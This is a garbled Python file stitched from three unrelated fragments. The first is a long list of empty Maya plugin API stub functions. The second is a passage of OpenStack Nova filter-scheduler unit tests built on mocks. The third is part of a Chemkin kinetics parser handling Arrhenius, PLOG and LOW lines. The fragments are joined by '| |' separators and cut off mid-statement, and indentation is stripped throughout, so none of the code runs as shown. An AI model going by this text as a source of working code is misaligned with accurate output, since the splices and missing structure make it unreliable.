def MPxHwShaderNode_normalsPerVertex(*args, **kwargs):
pass
def MPxTransform_getScalePivotTranslation(*args, **kwargs):
pass
def MPxTransform_applyScaleLocksPivot(*args, **kwargs):
pass
def MPxComponentShape_swiginit(*args, **kwargs):
pass
def MPxLocatorNode_underWorldObject_get(*args, **kwargs):
pass
def MPxSelectionContext_abortAction(*args, **kwargs):
pass
def MPxTransform_scale_set(*args, **kwargs):
pass
def MPx3dModelView_okForMultipleDraw(*args, **kwargs):
pass
def MPx3dModelView_displayAxisOn(*args, **kwargs):
pass
def MPxHwShaderNode_outMatteOpacityG_set(*args, **kwargs):
pass
def MPxImagePlane_centerY_get(*args, **kwargs):
pass
def MPxCommand_syntax(*args, **kwargs):
pass
def new_MPxMayaAsciiFilterOutput(*args, **kwargs):
pass
def delete_MPxGeometryFilter(*args, **kwargs):
pass
def MPxSpringNode_type(*args, **kwargs):
pass
def MPxCameraSet_sceneData_get(*args, **kwargs):
pass
def MPxBlendShape_inputTargetGroup_get(*args, **kwargs):
pass
def MPxTransform_parentMatrix_set(*args, **kwargs):
pass
def MPxTransform_shearXY_set(*args, **kwargs):
pass
def MPxNode_shouldSave(*args, **kwargs):
pass
def MPxNode_type(*args, **kwargs):
pass
def MPxTransform_rotatePivotTranslate_set(*args, **kwargs):
pass
def MPxControlCommand_className(*args, **kwargs):
pass
def MPx3dModelView_setDisplayAxisAtOrigin(*args, **kwargs):
pass
def delete_MPxToolCommand(*args, **kwargs):
pass
def MPxConstraintCommand_connectTarget(*args, **kwargs):
pass
def MPxFileTranslator_writer(*args, **kwargs):
pass
def MPxMotionPathNode_normal_set(*args, **kwargs):
pass
def MFnPlugin_registerIkSolver(*args, **kwargs):
pass
def MPxGeometryData_updateCompleteVertexGroup(*args, **kwargs):
pass
def MPxGeometryIterator_setObject(*args, **kwargs):
pass
def delete_MFnPlugin(*args, **kwargs):
pass
def MPxTransform_displayRotatePivot_set(*args, **kwargs):
pass
def MPxHwShaderNode_hasTransparency(*args, **kwargs):
pass
def disown_MPxPolyTweakUVCommand(*args, **kwargs):
pass
def MPxTransform_nodeBoundingBoxMinX_set(*args, **kwargs):
pass
def new_MPxFieldNode(*args, **kwargs):
pass
def MPxFieldNode_mInputPPData_set(*args, **kwargs):
pass
def new_MPxMidiInputDevice(*args, **kwargs):
pass
def MPxTransform_objectGroupColor_get(*args, **kwargs):
pass
def MPx3dModelView_userDefinedColorIndex(*args, **kwargs):
pass
def MPx3dModelView_fogSource(*args, **kwargs):
pass
def MFnPlugin_registerRenderPassImpl(*args, **kwargs):
pass
def MPxSurfaceShape_worldInverseMatrix_set(*args, **kwargs):
pass
def MPxImagePlane_colorOffsetR_get(*args, **kwargs):
pass
def MPx3dModelView_customDrawEnabled(*args, **kwargs):
pass
def MPxCommand_displayError(*args, **kwargs):
pass
def MPxMayaAsciiFilter_writesSetAttr(*args, **kwargs):
pass
def MPxObjectSet_edgesOnlySet_set(*args, **kwargs):
pass
def MPxIkSolverNode_type(*args, **kwargs):
pass
def MPxSurfaceShape_renderGroupComponentType(*args, **kwargs):
pass
def MPxIkSolverNode_toSolverSpace(*args, **kwargs):
pass
def MPxEmitterNode_mEmitterType_get(*args, **kwargs):
pass
def MFnPlugin_registerCacheFormat(*args, **kwargs):
pass
def MPxTransform_scalePivotTranslateX_get(*args, **kwargs):
pass
def MPxNode_postEvaluation(*args, **kwargs):
pass
def MPxManipulatorNode_doRelease(*args, **kwargs):
pass
def MPxTransform_minRotYLimitEnable_get(*args, **kwargs):
pass
def MPxLocatorNode_localPosition_set(*args, **kwargs):
pass
def MPxTransformationMatrix_baseTransformationMatrixId_set(*args, **kwargs):
pass
def MPxFluidEmitterNode_mEmitFluidColor_set(*args, **kwargs):
pass
def MPxPolyTweakUVInteractiveCommand_doIt(*args, **kwargs):
pass
def MPxManipContainer_addToManipConnectTable(*args, **kwargs):
pass
def MPxTransform_computeLocalTransformation(*args, **kwargs):
pass
def MPxManipulatorNode_addPointValue(*args, **kwargs):
pass
def MPxUITableControl_setNumberOfColumns(*args, **kwargs):
pass
def MPxUIControl_className(*args, **kwargs):
pass
def MPxImagePlane_coverageOriginX_set(*args, **kwargs):
pass
def MPxPolyTweakUVInteractiveCommand_cancel(*args, **kwargs):
pass
def MPxTransform_rotateQuaternionZ_set(*args, **kwargs):
pass
def MPxHardwareShader_getHardwareShaderPtr(*args, **kwargs):
pass
def new_MaterialInputData(*args, **kwargs):
pass
def MPxCacheFormat_writeTime(*args, **kwargs):
pass
def MPxCommand_getCurrentResult(*args, **kwargs):
pass
def MPxFieldNode_mInputVelocities_set(*args, **kwargs):
pass
def delete_MPxSkinCluster(*args, **kwargs):
pass
def MPxSurfaceShapeUI_snap(*args, **kwargs):
pass
def MPxTransform_overrideTexturing_get(*args, **kwargs):
pass
def MPx3dModelView_setViewSelected(*args, **kwargs):
pass
def MPxContext_toolOnSetup(*args, **kwargs):
pass
def delete_MPxObjectSet(*args, **kwargs):
pass
def disown_MPxContext(*args, **kwargs):
pass
def MPxHwShaderNode_outColorR_set(*args, **kwargs):
pass
def MPxTransformationMatrix_transformBy(*args, **kwargs):
pass
def MPxMaterialInformation_computeMaterial(*args, **kwargs):
pass
def MPxSurfaceShape_hasActiveComponents(*args, **kwargs):
pass
def MPxAnimCurveInterpolator_typeName(*args, **kwargs):
pass
def MPxConstraintCommand__syntax(*args, **kwargs):
pass
def MPxFileResolver_resolveURIWithContext(*args, **kwargs):
pass
def MPxHardwareShader_outColorB_get(*args, **kwargs):
pass
def MPxTransform_minScaleXLimit_set(*args, **kwargs):
pass
def MPxFluidEmitterNode_mFluidDropoff_get(*args, **kwargs):
pass
def MPxTransformationMatrix___ne__(*args, **kwargs):
pass
def MPxTransform_getRotation(*args, **kwargs):
pass
def MPxTransform__dirtyScalePivot(*args, **kwargs):
pass
def MPxMotionPathNode_updateOrientationMarkers_get(*args, **kwargs):
pass
def delete_MPxUITableControl(*args, **kwargs):
pass
def MPxImagePlane_frameExtension_set(*args, **kwargs):
pass
def MPx3dModelView_getCamera(*args, **kwargs):
pass
def MPxImagePlane_colorGainG_get(*args, **kwargs):
pass
def MPxComponentShape_localShapeInAttr(*args, **kwargs):
pass
def MPxTransform_overrideLevelOfDetail_get(*args, **kwargs):
pass
def MPxMaterialInformation_swiginit(*args, **kwargs):
pass
def MPxEmitterNode_getOwnerShape(*args, **kwargs):
pass
def MPxCacheFormat_readInt32(*args, **kwargs):
pass
def MPxGeometryFilter_envelope_get(*args, **kwargs):
pass
def MPxTransform_identification_set(*args, **kwargs):
pass
def MPxTransform_rotateOrder_get(*args, **kwargs):
pass
def MFnPlugin_removeMenuItem(*args, **kwargs):
pass
def MPxNode_postConstructor(*args, **kwargs):
pass
def MPxTransform_maxTransXLimit_set(*args, **kwargs):
pass
def MPxContext_setImage(*args, **kwargs):
pass
def MPxContextCommand_swiginit(*args, **kwargs):
pass
def MPxManipulatorNode_setVectorValue(*args, **kwargs):
pass
def MPxAssembly_supportsMemberChanges(*args, **kwargs):
pass
def MPxManipContainer_className(*args, **kwargs):
pass
def MPxTransformationMatrix_rotateBy(*args, **kwargs):
pass
def MPxTexContext_portToView(*args, **kwargs):
pass
def MPxFluidEmitterNode_compute(*args, **kwargs):
pass
def MPxConstraintCommand_offsetAttribute(*args, **kwargs):
pass
def new_MPxFileTranslator(*args, **kwargs):
pass
def MPxMotionPathNode_sideTwist_get(*args, **kwargs):
pass
def MPxLocatorNode_nodeBoundingBoxSizeZ_set(*args, **kwargs):
pass
def MPxMayaAsciiFilter_swiginit(*args, **kwargs):
pass
def MPxEmitterNode_mDeltaTime_get(*args, **kwargs):
pass
def MPxTransform_selectHandle_set(*args, **kwargs):
pass
def MPxLocatorNode_useObjectColor_get(*args, **kwargs):
pass
def MPxTransform_setRotatePivot(*args, **kwargs):
pass
def MPxTransform_checkAndSetTranslation(*args, **kwargs):
pass
def MPxSelectionContext_addManipulator(*args, **kwargs):
pass
def MPx3dModelView_destroyOnPanelDestruction(*args, **kwargs):
pass
def MPx3dModelView_displayCameraAnnotationOn(*args, **kwargs):
pass
def MPxImagePlane_shadingSamplesOverride_set(*args, **kwargs):
pass
def MPx3dModelView_setWireframeOnShaded(*args, **kwargs):
pass
def MPxSurfaceShape_parentMatrix_set(*args, **kwargs):
pass
def MPxHardwareShader_findResource(*args, **kwargs):
pass
def MPxImagePlane_width_get(*args, **kwargs):
pass
def delete_MPxMidiInputDevice(*args, **kwargs):
pass
def MPxNode_message_set(*args, **kwargs):
pass
def MPxGeometryFilter_accessoryNodeSetup(*args, **kwargs):
pass
def MPxSpringNode_mEnd1Weight_set(*args, **kwargs):
pass
def MFnPlugin_deregisterRenderPassImpl(*args, **kwargs):
pass
def new_MPxHwShaderNode(*args, **kwargs):
pass
def MPxGlBuffer_bindFbo(*args, **kwargs):
pass
def MPxManipulatorNode_connectToDependNode(*args, **kwargs):
pass
def MPxTransform_shearYZ_set(*args, **kwargs):
pass
def MPxNode_getExternalContent(*args, **kwargs):
pass
def MPxTransform_rotatePivotTranslateY_get(*args, **kwargs):
pass
def delete_MPxDragAndDropBehavior(*args, **kwargs):
pass
def MPxTransformationMatrix_setScalePivot(*args, **kwargs):
pass
def MPxLocatorNode_localScaleY_set(*args, **kwargs):
pass
def MPxRepresentation_inactivate(*args, **kwargs):
pass
def MPxTransformationMatrix_swigregister(*args, **kwargs):
pass
def disown_MPxConstraintCommand(*args, **kwargs):
pass
def MExternalContentLocationTable_length(*args, **kwargs):
pass
def MPxMotionPathNode_inverseFront_get(*args, **kwargs):
pass
def MPxGeometryData_smartCopy(*args, **kwargs):
pass
def MPxMotionPathNode_allCoordinates_set(*args, **kwargs):
pass
def disown_MPxUITableControl(*args, **kwargs):
pass
def MPxGeometryIterator_className(*args, **kwargs):
pass
def MPxTransform_dynamics_get(*args, **kwargs):
pass
def MaterialInputData_shininess_set(*args, **kwargs):
pass
def MPxImagePlane_colorOffsetB_set(*args, **kwargs):
pass
def MPxTransform_nodeBoundingBoxMinZ_get(*args, **kwargs):
pass
def MPxTransform_worldMatrix_get(*args, **kwargs):
pass
def MPxTransform_useObjectColor_set(*args, **kwargs):
pass
def MPx3dModelView_backgroundColor(*args, **kwargs):
pass
def MPx3dModelView_fogDensity(*args, **kwargs):
pass
def MPxSurfaceShape_instObjGroups_set(*args, **kwargs):
pass
def MPxImagePlane_depthOversample_set(*args, **kwargs):
pass
def MPx3dModelView_requestOkForDraw(*args, **kwargs):
pass
def MPxCommand_clearResult(*args, **kwargs):
pass
def MPxObjectSet_editPointsOnlySet_get(*args, **kwargs):
pass
def MPxMidiInputDevice_nameButtons(*args, **kwargs):
pass
def MPxEditData__getStringValue(*args, **kwargs):
pass
def MPxIkSolverNode_postSolve(*args, **kwargs):
pass
def MPxIkSolverNode_create(*args, **kwargs):
pass
def MFnPlugin_addMenuItem(*args, **kwargs):
pass
def MPxAttributePatternFactory_swiginit(*args, **kwargs):
pass
def MPxTransform_maxRotXLimit_get(*args, **kwargs):
pass
def MPxTransform_scalePivotTranslateY_set(*args, **kwargs):
pass
def MPxManipulatorNode_getDoubleValue(*args, **kwargs):
pass
def MPxLocatorNode_localPositionY_get(*args, **kwargs):
pass
def MPxHardwareShader_type(*args, **kwargs):
pass
def new_MPxGlBuffer(*args, **kwargs):
pass
def MPxManipContainer_doRelease(*args, **kwargs):
pass
def MPxPolyTrg_isAbstractClass(*args, **kwargs):
pass
def MPxLocatorNode_instObjGroups_set(*args, **kwargs):
pass
def MPxTransform_limitValue(*args, **kwargs):
pass
def MPxTransform_setRotationOrder(*args, **kwargs):
pass
def MPxNode_internalArrayCount(*args, **kwargs):
pass
def MPxGeometryIterator_iteratorCount(*args, **kwargs):
pass
def MPxUITableControl_labelString(*args, **kwargs):
pass
def delete_MPxImagePlane(*args, **kwargs):
pass
def MPxEmitterNode_mMaxDistance_get(*args, **kwargs):
pass
def MPxImagePlane_sourceTexture_get(*args, **kwargs):
pass
def MPxTransform_rotationInterpolation_set(*args, **kwargs):
pass
def MPxData_copy(*args, **kwargs):
pass
def MaterialInputData_swiginit(*args, **kwargs):
pass
def MPxCacheFormat_readNextTime(*args, **kwargs):
pass
def MPxSurfaceShape_matrix_get(*args, **kwargs):
pass
def MPxParticleAttributeMapperNode_vCoordPP_get(*args, **kwargs):
pass
def MPxSurfaceShape_isTemplated_get(*args, **kwargs):
pass
def MPxTransform_ghosting_set(*args, **kwargs):
pass
def MPxTransform_overrideEnabled_get(*args, **kwargs):
pass
def MPxTransform_translateY_get(*args, **kwargs):
pass
def | |
= [
mock.call(ctx.elevated.return_value, self.placement_client,
spec_obj, uuids.instance0,
alloc_reqs_by_rp_uuid[uuids.cn2][0],
allocation_request_version=None),
mock.call(ctx.elevated.return_value, self.placement_client,
spec_obj, uuids.instance1,
alloc_reqs_by_rp_uuid[uuids.cn1][0],
allocation_request_version=None),
]
mock_claim.assert_has_calls(claim_calls)
# Check that _get_sorted_hosts() is called twice and that the
# second time, we pass it the hosts that were returned from
# _get_sorted_hosts() the first time
sorted_host_calls = [
mock.call(spec_obj, all_host_states, 0),
mock.call(spec_obj, [hs2, hs1], 1),
]
mock_get_hosts.assert_has_calls(sorted_host_calls)
# The instance group object should have both host1 and host2 in its
# instance group hosts list and there should not be any "changes" to
# save in the instance group object
self.assertEqual(['host2', 'host1'], ig.hosts)
self.assertEqual({}, ig.obj_get_changes())
@mock.patch('random.choice', side_effect=lambda x: x[1])
@mock.patch('nova.scheduler.host_manager.HostManager.get_weighed_hosts')
@mock.patch('nova.scheduler.host_manager.HostManager.get_filtered_hosts')
def test_get_sorted_hosts(self, mock_filt, mock_weighed, mock_rand):
"""Tests the call that returns a sorted list of hosts by calling the
host manager's filtering and weighing routines
"""
self.flags(host_subset_size=2, group='filter_scheduler')
hs1 = mock.Mock(spec=host_manager.HostState, host='host1',
cell_uuid=uuids.cell1)
hs2 = mock.Mock(spec=host_manager.HostState, host='host2',
cell_uuid=uuids.cell2)
all_host_states = [hs1, hs2]
mock_weighed.return_value = [
weights.WeighedHost(hs1, 1.0), weights.WeighedHost(hs2, 1.0),
]
results = self.driver._get_sorted_hosts(mock.sentinel.spec,
all_host_states, mock.sentinel.index)
mock_filt.assert_called_once_with(all_host_states, mock.sentinel.spec,
mock.sentinel.index)
mock_weighed.assert_called_once_with(mock_filt.return_value,
mock.sentinel.spec)
# We override random.choice() to pick the **second** element of the
# returned weighed hosts list, which is the host state #2. This tests
# the code path that combines the randomly-chosen host with the
# remaining list of weighed host state objects
self.assertEqual([hs2, hs1], results)
@mock.patch('random.choice', side_effect=lambda x: x[0])
@mock.patch('nova.scheduler.host_manager.HostManager.get_weighed_hosts')
@mock.patch('nova.scheduler.host_manager.HostManager.get_filtered_hosts')
def test_get_sorted_hosts_subset_less_than_num_weighed(self, mock_filt,
mock_weighed, mock_rand):
"""Tests that when we have >1 weighed hosts but a host subset size of
1, that we always pick the first host in the weighed host
"""
self.flags(host_subset_size=1, group='filter_scheduler')
hs1 = mock.Mock(spec=host_manager.HostState, host='host1',
cell_uuid=uuids.cell1)
hs2 = mock.Mock(spec=host_manager.HostState, host='host2',
cell_uuid=uuids.cell2)
all_host_states = [hs1, hs2]
mock_weighed.return_value = [
weights.WeighedHost(hs1, 1.0), weights.WeighedHost(hs2, 1.0),
]
results = self.driver._get_sorted_hosts(mock.sentinel.spec,
all_host_states, mock.sentinel.index)
mock_filt.assert_called_once_with(all_host_states, mock.sentinel.spec,
mock.sentinel.index)
mock_weighed.assert_called_once_with(mock_filt.return_value,
mock.sentinel.spec)
# We should be randomly selecting only from a list of one host state
mock_rand.assert_called_once_with([hs1])
self.assertEqual([hs1, hs2], results)
@mock.patch('random.choice', side_effect=lambda x: x[0])
@mock.patch('nova.scheduler.host_manager.HostManager.get_weighed_hosts')
@mock.patch('nova.scheduler.host_manager.HostManager.get_filtered_hosts')
def test_get_sorted_hosts_subset_greater_than_num_weighed(self, mock_filt,
mock_weighed, mock_rand):
"""Hosts should still be chosen if host subset size is larger than
number of weighed hosts.
"""
self.flags(host_subset_size=20, group='filter_scheduler')
hs1 = mock.Mock(spec=host_manager.HostState, host='host1',
cell_uuid=uuids.cell1)
hs2 = mock.Mock(spec=host_manager.HostState, host='host2',
cell_uuid=uuids.cell2)
all_host_states = [hs1, hs2]
mock_weighed.return_value = [
weights.WeighedHost(hs1, 1.0), weights.WeighedHost(hs2, 1.0),
]
results = self.driver._get_sorted_hosts(mock.sentinel.spec,
all_host_states, mock.sentinel.index)
mock_filt.assert_called_once_with(all_host_states, mock.sentinel.spec,
mock.sentinel.index)
mock_weighed.assert_called_once_with(mock_filt.return_value,
mock.sentinel.spec)
# We overrode random.choice() to return the first element in the list,
# so even though we had a host_subset_size greater than the number of
# weighed hosts (2), we just random.choice() on the entire set of
# weighed hosts and thus return [hs1, hs2]
self.assertEqual([hs1, hs2], results)
@mock.patch('random.shuffle', side_effect=lambda x: x.reverse())
@mock.patch('nova.scheduler.host_manager.HostManager.get_weighed_hosts')
@mock.patch('nova.scheduler.host_manager.HostManager.get_filtered_hosts')
def test_get_sorted_hosts_shuffle_top_equal(self, mock_filt, mock_weighed,
mock_shuffle):
"""Tests that top best weighed hosts are shuffled when enabled.
"""
self.flags(host_subset_size=1, group='filter_scheduler')
self.flags(shuffle_best_same_weighed_hosts=True,
group='filter_scheduler')
hs1 = mock.Mock(spec=host_manager.HostState, host='host1')
hs2 = mock.Mock(spec=host_manager.HostState, host='host2')
hs3 = mock.Mock(spec=host_manager.HostState, host='host3')
hs4 = mock.Mock(spec=host_manager.HostState, host='host4')
all_host_states = [hs1, hs2, hs3, hs4]
mock_weighed.return_value = [
weights.WeighedHost(hs1, 1.0),
weights.WeighedHost(hs2, 1.0),
weights.WeighedHost(hs3, 0.5),
weights.WeighedHost(hs4, 0.5),
]
results = self.driver._get_sorted_hosts(mock.sentinel.spec,
all_host_states, mock.sentinel.index)
mock_filt.assert_called_once_with(all_host_states, mock.sentinel.spec,
mock.sentinel.index)
mock_weighed.assert_called_once_with(mock_filt.return_value,
mock.sentinel.spec)
# We override random.shuffle() to reverse the list, thus the
# head of the list should become [host#2, host#1]
# (as the host_subset_size is 1) and the tail should stay the same.
self.assertEqual([hs2, hs1, hs3, hs4], results)
def test_cleanup_allocations(self):
instance_uuids = []
# Check we don't do anything if there's no instance UUIDs to cleanup
# allocations for
pc = self.placement_client
self.driver._cleanup_allocations(self.context, instance_uuids)
self.assertFalse(pc.delete_allocation_for_instance.called)
instance_uuids = [uuids.instance1, uuids.instance2]
self.driver._cleanup_allocations(self.context, instance_uuids)
exp_calls = [mock.call(self.context, uuids.instance1),
mock.call(self.context, uuids.instance2)]
pc.delete_allocation_for_instance.assert_has_calls(exp_calls)
def test_add_retry_host(self):
retry = dict(num_attempts=1, hosts=[])
filter_properties = dict(retry=retry)
host = "fakehost"
node = "fakenode"
scheduler_utils._add_retry_host(filter_properties, host, node)
hosts = filter_properties['retry']['hosts']
self.assertEqual(1, len(hosts))
self.assertEqual([host, node], hosts[0])
def test_post_select_populate(self):
# Test addition of certain filter props after a node is selected.
retry = {'hosts': [], 'num_attempts': 1}
filter_properties = {'retry': retry}
selection = objects.Selection(service_host="host", nodename="node",
cell_uuid=uuids.cell)
scheduler_utils.populate_filter_properties(filter_properties,
selection)
self.assertEqual(['host', 'node'],
filter_properties['retry']['hosts'][0])
@mock.patch('nova.scheduler.filter_scheduler.FilterScheduler.'
'_schedule')
def test_select_destinations_match_num_instances(self, mock_schedule):
"""Tests that the select_destinations() method returns the list of
hosts from the _schedule() method when the number of returned hosts
equals the number of instance UUIDs passed in.
"""
spec_obj = objects.RequestSpec(
flavor=objects.Flavor(memory_mb=512,
root_gb=512,
ephemeral_gb=0,
swap=0,
vcpus=1),
project_id=uuids.project_id,
num_instances=1)
mock_schedule.return_value = [[fake_selection]]
dests = self.driver.select_destinations(self.context, spec_obj,
[mock.sentinel.instance_uuid], mock.sentinel.alloc_reqs_by_rp_uuid,
mock.sentinel.p_sums, mock.sentinel.ar_version)
mock_schedule.assert_called_once_with(self.context, spec_obj,
[mock.sentinel.instance_uuid], mock.sentinel.alloc_reqs_by_rp_uuid,
mock.sentinel.p_sums, mock.sentinel.ar_version, False)
self.assertEqual([[fake_selection]], dests)
@mock.patch('nova.scheduler.filter_scheduler.FilterScheduler.'
'_schedule')
def test_select_destinations_for_move_ops(self, mock_schedule):
"""Tests that the select_destinations() method verifies the number of
hosts returned from the _schedule() method against the number of
instance UUIDs passed as a parameter and not against the RequestSpec
num_instances field since the latter could be wrong in case of a move
operation.
"""
spec_obj = objects.RequestSpec(
flavor=objects.Flavor(memory_mb=512,
root_gb=512,
ephemeral_gb=0,
swap=0,
vcpus=1),
project_id=uuids.project_id,
num_instances=2)
mock_schedule.return_value = [[fake_selection]]
dests = self.driver.select_destinations(self.context, spec_obj,
[mock.sentinel.instance_uuid], mock.sentinel.alloc_reqs_by_rp_uuid,
mock.sentinel.p_sums, mock.sentinel.ar_version)
mock_schedule.assert_called_once_with(self.context, spec_obj,
[mock.sentinel.instance_uuid], mock.sentinel.alloc_reqs_by_rp_uuid,
mock.sentinel.p_sums, mock.sentinel.ar_version, False)
self.assertEqual([[fake_selection]], dests)
@mock.patch('nova.scheduler.utils.claim_resources', return_value=True)
@mock.patch('nova.scheduler.filter_scheduler.FilterScheduler.'
'_get_all_host_states')
@mock.patch('nova.scheduler.filter_scheduler.FilterScheduler.'
'_get_sorted_hosts')
def test_schedule_fewer_num_instances(self, mock_get_hosts,
mock_get_all_states, mock_claim):
"""Tests that the _schedule() method properly handles
resetting host state objects and raising NoValidHost when there are not
enough hosts available.
"""
spec_obj = objects.RequestSpec(
num_instances=2,
flavor=objects.Flavor(memory_mb=512,
root_gb=512,
ephemeral_gb=0,
swap=0,
vcpus=1),
project_id=uuids.project_id,
instance_group=None)
host_state = mock.Mock(spec=host_manager.HostState, host="fake_host",
uuid=uuids.cn1, cell_uuid=uuids.cell, nodename="fake_node",
limits={}, updated="Not None")
all_host_states = [host_state]
mock_get_all_states.return_value = all_host_states
mock_get_hosts.side_effect = [all_host_states, []]
instance_uuids = [uuids.inst1, uuids.inst2]
fake_allocs_by_rp = {uuids.cn1: [{}]}
self.assertRaises(exception.NoValidHost, self.driver._schedule,
self.context, spec_obj, instance_uuids, fake_allocs_by_rp,
mock.sentinel.p_sums)
self.assertIsNone(host_state.updated)
@mock.patch("nova.scheduler.host_manager.HostState.consume_from_request")
@mock.patch('nova.scheduler.utils.claim_resources')
@mock.patch("nova.scheduler.filter_scheduler.FilterScheduler."
"_get_sorted_hosts")
@mock.patch("nova.scheduler.filter_scheduler.FilterScheduler."
"_get_all_host_states")
def _test_alternates_returned(self, mock_get_all_hosts, mock_sorted,
mock_claim, mock_consume, num_instances=2, num_alternates=2):
all_host_states = []
alloc_reqs = {}
for num in range(10):
host_name = "host%s" % num
hs = host_manager.HostState(host_name, "node%s" % num,
uuids.cell)
hs.uuid = getattr(uuids, host_name)
all_host_states.append(hs)
alloc_reqs[hs.uuid] = [{}]
mock_get_all_hosts.return_value = all_host_states
mock_sorted.return_value = all_host_states
mock_claim.return_value = True
total_returned = num_alternates + 1
self.flags(max_attempts=total_returned, group="scheduler")
instance_uuids = [getattr(uuids, "inst%s" % num)
for num in range(num_instances)]
spec_obj = objects.RequestSpec(
num_instances=num_instances,
flavor=objects.Flavor(memory_mb=512,
root_gb=512,
ephemeral_gb=0,
swap=0,
vcpus=1),
project_id=uuids.project_id,
instance_group=None)
dests = self.driver._schedule(self.context, spec_obj,
instance_uuids, alloc_reqs, None, return_alternates=True)
self.assertEqual(num_instances, len(dests))
# Filtering and weighing hosts should be called num_instances + 1 times
# unless num_instances == 1.
self.assertEqual(num_instances + 1 if num_instances > 1 else 1,
mock_sorted.call_count,
'Unexpected number of calls to filter hosts for %s '
'instances.' % num_instances)
selected_hosts = [dest[0] for dest in dests]
for dest in dests:
self.assertEqual(total_returned, len(dest))
# Verify that there are no duplicates among a destination
self.assertEqual(len(dest), len(set(dest)))
# Verify that none of the selected hosts appear in the alternates.
for alt in dest[1:]:
self.assertNotIn(alt, selected_hosts)
def test_alternates_returned(self):
self._test_alternates_returned(num_instances=1, num_alternates=1)
self._test_alternates_returned(num_instances=3, num_alternates=0)
self._test_alternates_returned(num_instances=1, num_alternates=4)
self._test_alternates_returned(num_instances=2, num_alternates=3)
self._test_alternates_returned(num_instances=8, num_alternates=8)
@mock.patch("nova.scheduler.host_manager.HostState.consume_from_request")
@mock.patch('nova.scheduler.utils.claim_resources')
@mock.patch("nova.scheduler.filter_scheduler.FilterScheduler."
"_get_sorted_hosts")
@mock.patch("nova.scheduler.filter_scheduler.FilterScheduler."
"_get_all_host_states")
def test_alternates_same_cell(self, mock_get_all_hosts, mock_sorted,
mock_claim, mock_consume):
"""Tests getting alternates plus claims where the hosts are spread
across two cells.
"""
all_host_states = []
alloc_reqs = {}
for num in range(10):
host_name = "host%s" % num
cell_uuid = uuids.cell1 if num % 2 else uuids.cell2
hs = host_manager.HostState(host_name, "node%s" % num,
cell_uuid)
hs.uuid = getattr(uuids, host_name)
all_host_states.append(hs)
alloc_reqs[hs.uuid] = [{}]
mock_get_all_hosts.return_value = all_host_states
# There are two instances so _get_sorted_hosts is called once per
# instance and then once again before picking alternates.
mock_sorted.side_effect = [all_host_states,
list(reversed(all_host_states)),
all_host_states]
mock_claim.return_value = True
total_returned = 3
self.flags(max_attempts=total_returned, group="scheduler")
instance_uuids = [uuids.inst1, uuids.inst2]
num_instances = len(instance_uuids)
spec_obj = objects.RequestSpec(
num_instances=num_instances,
flavor=objects.Flavor(memory_mb=512,
root_gb=512,
ephemeral_gb=0,
swap=0,
vcpus=1),
project_id=uuids.project_id,
instance_group=None)
dests = self.driver._schedule(self.context, spec_obj,
instance_uuids, alloc_reqs, None, return_alternates=True)
# There should be max_attempts hosts per instance (1 selected, 2 alts)
self.assertEqual(total_returned, len(dests[0]))
self.assertEqual(total_returned, len(dests[1]))
# Verify that the two selected hosts are not in the same cell.
self.assertNotEqual(dests[0][0].cell_uuid, dests[1][0].cell_uuid)
for dest in dests:
selected_host = dest[0]
selected_cell_uuid = selected_host.cell_uuid
for alternate in dest[1:]:
self.assertEqual(alternate.cell_uuid, selected_cell_uuid)
@mock.patch("nova.scheduler.host_manager.HostState.consume_from_request")
@mock.patch('nova.scheduler.utils.claim_resources')
@mock.patch("nova.scheduler.filter_scheduler.FilterScheduler."
"_get_sorted_hosts")
@mock.patch("nova.scheduler.filter_scheduler.FilterScheduler."
"_get_all_host_states")
def _test_not_enough_alternates(self, mock_get_all_hosts, mock_sorted,
mock_claim, mock_consume, num_hosts, max_attempts):
all_host_states = []
alloc_reqs = {}
for num in range(num_hosts):
host_name = "host%s" % num
hs = host_manager.HostState(host_name, "node%s" % num,
uuids.cell)
hs.uuid = getattr(uuids, host_name)
all_host_states.append(hs)
alloc_reqs[hs.uuid] = [{}]
mock_get_all_hosts.return_value = all_host_states
mock_sorted.return_value = all_host_states
mock_claim.return_value = True
# Set the total returned to more than the number of available hosts
self.flags(max_attempts=max_attempts, group="scheduler")
instance_uuids = [uuids.inst1, uuids.inst2]
num_instances = len(instance_uuids)
spec_obj = objects.RequestSpec(
num_instances=num_instances,
flavor=objects.Flavor(memory_mb=512,
root_gb=512,
ephemeral_gb=0,
swap=0,
vcpus=1),
project_id=uuids.project_id,
| |
float(A)
else:
A, n, Ea = items[-3:]
dA = '0'; dn = '0'; dEa = '0'
A = float(A)
kunits = Aunits[len(reactants)+1] if hasThirdBody else Aunits[len(reactants)]
if dA[0] == '*':
A = Quantity(A,kunits,'*|/',float(dA[1:]))
else:
dA = float(dA)
if dA != 0:
A = Quantity(A,kunits,'+|-',dA)
else:
A = Quantity(A,kunits)
n = float(n); dn = float(dn)
if dn != 0:
n = Quantity(n,'','+|-',dn)
else:
n = Quantity(n,'')
Ea = float(Ea); dEa = float(dEa)
if dEa != 0:
Ea = Quantity(Ea,Eunits,'+|-',dEa)
else:
Ea = Quantity(Ea,Eunits)
kinetics = Arrhenius(A=A, n=n, Ea=Ea, T0=(1.0,"K"))
if hasThirdBody:
kinetics = ThirdBody(arrheniusLow=kinetics)
reaction = Reaction(
reactants=reactants,
products=products,
kinetics=kinetics,
reversible=(arrow in ['<=>', '=']),
)
reaction.kinetics.comment = next_reaction_comment
next_reaction_comment = ""
reactions.append(reaction)
elif 'PLOG' in line:
# This line contains pressure-dependent Arrhenius parameters in Chemkin format
items = line.split('/')
P, A, n, Ea = items[1].split()
P = float(P)
A = Quantity(float(A), Aunits[len(reactants)])
n = Quantity(float(n), '')
Ea = Quantity(float(Ea), Eunits)
arrhenius = Arrhenius(A=A, n=n, Ea=Ea, T0=(1.0,"K"))
if not isinstance(kinetics, PDepArrhenius):
old_kinetics = kinetics
comment = old_kinetics.comment
old_kinetics.comment = ''
assert isinstance(old_kinetics, Arrhenius)
kinetics = PDepArrhenius(pressures=([P],"atm"), arrhenius=[arrhenius], highPlimit=old_kinetics, comment=comment)
else:
pressures = list(kinetics.pressures.values)
pressures.append(P*101325.)
kinetics.pressures.values = numpy.array(pressures, numpy.float)
kinetics.arrhenius.append(arrhenius)
reaction.kinetics = kinetics
elif 'LOW' in line:
# This line contains low-pressure-limit Arrhenius parameters in Chemkin format
# Upgrade the kinetics to a Lindemann if not already done
if isinstance(kinetics, Lindemann):
pass
elif isinstance(kinetics, ThirdBody):
kinetics = Lindemann(arrheniusHigh=kinetics.arrheniusLow,
efficiencies=kinetics.efficiencies,
comment=kinetics.comment)
reaction.kinetics = kinetics
elif isinstance(kinetics, Arrhenius):
kinetics = Lindemann(arrheniusHigh=kinetics, comment=kinetics.comment)
